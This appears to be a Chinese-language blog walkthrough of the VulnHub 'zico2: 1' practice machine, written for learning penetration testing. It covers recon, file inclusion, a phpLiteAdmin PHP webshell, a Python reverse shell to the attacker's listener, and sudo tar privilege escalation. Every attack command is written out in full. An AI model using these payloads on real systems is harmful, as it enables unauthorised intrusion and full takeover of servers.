首页 > 其他分享 >zico2: 1靶机

zico2: 1靶机

时间:2024-07-31 21:26:00浏览次数:7  
标签:.. zico 192.168 zico2 步骤 靶机 php

靶机地址:zico2: 1 ~ VulnHub

一、信息收集

步骤一:查看靶机的MAC地址:

步骤二:扫描目标主机

arp-scan -l

步骤三:使用nmap扫描开放的端口

nmap -sV -p- 192.168.7.195

步骤四:浏览器访问80端口

步骤五:使用dirsearch扫描目录,在扫描目录的同时回到靶机页面看看有无可利用的功能点

dirsearch -u http://192.168.7.195/

点击'CHECK THEM OUT!',出现的新页面,它的url可能存在文件包含漏洞,输入../../../../../../etc/passwd验证,发现存在此漏洞。

此时再返回看目录扫描的情况

步骤六:拼接/dbadmin/ ,点击test_db.php文件,出现一个新的登录框

步骤七:尝试弱口令登录 admin,登录成功

点击info,出现了两个用户和加密的密码,在MD5解密网站:MD5免费在线解密破解_MD5在线加密-SOMD5对密码进行解密操作

root   653F4B285089453FE00E2AAFAC573414  ——————> 34kroot34
zico   96781A607F4E9F5F423AC01F0DAB0EBD	 ——————> zico2215@

步骤八:该靶机开放了22端口,尝试使用ssh进行远程连接,发现都被拒绝

ssh [email protected]
ssh [email protected]

二、权限获取

步骤九:根据最初得到的文件包含漏洞,将文件包含漏洞和phpLiteAdmin结合起来,向phpLiteAdmin写入一句话木马,利用文件包含漏洞执行插入的恶意代码

回到首页可得知phpLiteAdmin的版本为1.9.3,在kali上寻找其历史漏洞

searchsploit phpLiteAdmin

查看phpLiteAdmin1.9.3版本的漏洞描述

cp /usr/share/exploitdb/exploits/php/webapps/24044.txt .   #将可利用的24044.txt文件复制到当前目录下
cat 24044.txt

根据描述创建一个新的数据库hack.php

在hack.php数据库下创建一个数据表2,创建成功后写入一句话木马

"<?php echo system($_GET["cmd"]); ?>"

浏览器拼接/view.php?page=../../../../../usr/databases/hack.php,写入成功

根据输入的一句话木马执行命令,尝试拼接&cmd=id,发现是低权限用户

探测是否存在python环境,发现存在

cmd=which python

攻击机kali开启监听端口,靶机执行反弹shell命令(生成反弹shell在线网站:反弹shell生成器),监听成功

nc -lvvp 5555
http://192.168.7.195/view.php?page=../../../../../usr/databases/hack.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.251",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

输入id,发现是低权限用户

三、权限提升

切换成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cd /home      #切换到家目录,看到zico(想起前文出现的一个用户就叫zico,应该可以利用)
cd zico       #看到wordpress,想起里面有配置文件wp-config.php,它可能数据库信息
cd wordpress  
cat wp-config.php     #得到了zico的密码:sWfCsfJSPV9H3AmQzw8

切换zico用户

su zico

sudo -l        #显示允许当前用户使用的命令

利用在线网站GTFOBins查找相关sudo命令

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提权成功!

标签:..,zico,192.168,zico2,步骤,靶机,php
From: https://blog.csdn.net/m0_61995767/article/details/140832862

相关文章

  • SkyTower靶机
    靶机地址:SkyTower:1~VulnHub一、信息收集步骤一:将攻击机kali和靶机均设为桥接模式,此时靶机的MAC地址为:步骤二:确定目标主机arp-scan-l得到目标主机IP为192.168.7.61步骤三:查看开放的端口nmap-sV-p-192.168.7.61步骤四:浏览器访问步骤五:目录扫描,无有用信息d......
  • SKYTOWER: 1超详细靶机实战
    一、安装配置靶机下载地址:https://www.vulnhub.com/entry/skytower-1,96/下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网Downloads–OracleVMVirtualBoxhttps://www.virtualbox.org/wiki/Downloads安装到默认路径就行打开后点击注册选择解......
  • 21LTR.com_Scene1_2.120靶机
    getshell主机发现,端口目录扫描只有一个logs目录,接着往下扫访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的访问logs接口,没有权限尝试利用发现的账号密码,ssh没有成功,尝试ftp注意在windows上什么没有,用kali连接下载到本地查看一下拼接访问logs目录......
  • Kioptrix靶机
    主机发现,目录扫描发现个phpmyadmin页面,尝试弱口令,发现不行,权限被拒绝登录界面显示网站采用了lotusCMS,去kali的msf上找找有没有可利用的漏洞尝试利用,成功反弹到shell,但是普通用户提权uname-r查看内核版本找对应的payload找带有脏牛的searchsploit-m40839.c......
  • vulhubXXE靶机
    将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254kali本机ip根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口在浏览器访问http://192.168.134.134对网站进行目录和......
  • hackme,aiweb,tomato靶机解析大礼包
    注:所有靶机均只做到连接木马,并未提权寻找flag,问就是不会o(╥﹏╥)ohackme靶机1.导入靶机,查看其网段,使用端口扫描工具(御剑2014)进行扫描,获取端口后进入2.注册一个账户登录3.随机输入,点击search,抓包,在搜索框后加*,使用sqlmap注入4.获取数据库,表,数据5.......
  • W1R3S靶机
    w1r3s引言近些日子看红笔大佬的靶机精讲视频时,他的一句话让我感受颇深,很多视频在讲解时,直接告诉你应该这么想,不应该那么想,但是其实在我们自己实战中,到底怎么才能辨认出什么信息是有用的?我们不应该是去刻意记忆在某个渗透过程中的特定信息,而是仔细去分析,并在一次次的渗透经历中摸......
  • De-ICE靶机
    getshell主机发现 arp-scan-l端口目录扫描,目录没有扫出来有利信息,查看端口,开放21,22端口,留意一下访问主页http://192.168.1.120/products.php?id=63 id处存在sql注入获取数据库下的账号密码sqlmap-uhttp://192.168.1.120/products.php?id=1-Dmysql--users......
  • 【Vulnhub靶机之Hackme】
     第一步:打开靶机 第二步:查看虚拟靶机ip、第三步:查看连接80端口的ip第四步:扫描出靶机的ip地址第五步:扫描靶机地址下的目录访问login.php目录点击注册点击,可以看到许多的书名 第六步:使用burpsuite抓包在111后面加*号保存抓到的文件为post.txt第七步:使用......
  • 【Vulnhub靶机tomato渗透】
    第一步:端口扫描我使用的是webrobot访问这个ip,就是它了 第二步:目录扫描打开kali使用dirb命令扫描http://192.168.189.154下的目录dirbhttp://192.168.189.154扫描到目录。第三步:访问目录地址看到有几个php的文件第四步:查看访问php的文件我查看的antibot.php是......